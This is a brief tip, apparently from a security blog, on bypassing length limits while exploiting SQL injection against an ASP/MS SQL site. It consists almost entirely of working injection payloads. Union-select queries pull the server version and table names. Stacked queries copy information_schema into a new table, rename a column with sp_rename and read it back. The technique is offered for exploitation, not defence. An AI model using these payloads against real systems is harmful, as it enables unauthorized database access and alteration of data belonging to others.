Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g
- myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- works
- myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- may not work(too long)
One solution to this problem could be:-
- myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
- myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'--
- myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--
Thanks Ferruh for the help